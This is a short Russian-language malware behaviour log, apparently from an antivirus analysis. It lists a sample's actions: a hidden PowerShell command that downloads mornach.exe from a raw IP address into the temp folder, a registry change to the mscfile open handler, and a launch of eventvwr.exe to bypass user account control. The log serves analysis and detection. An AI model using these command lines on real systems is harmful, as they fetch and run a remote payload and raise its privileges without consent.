Техническая информация
- [HKCU\Software\Classes\mscfile\shell\open\command] '' = '%TEMP%\mornach.exe'
- http://193.150.13.63/mornach.exe как %temp%\mornach.exe
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://193.150.13.63/mornach.exe','%TEMP%\mornach.exe') & reg add HKCU\Software\Classes\mscfi...
- '19#.#50.13.63':80
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://193.150.13.63/mornach.exe','%TEMP%\mornach.exe') & reg add HKCU\Software\Classes\mscfi...' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\mscfile\shell\open\command /d %TEMP%\mornach.exe /f
- '<SYSTEM32>\eventvwr.exe'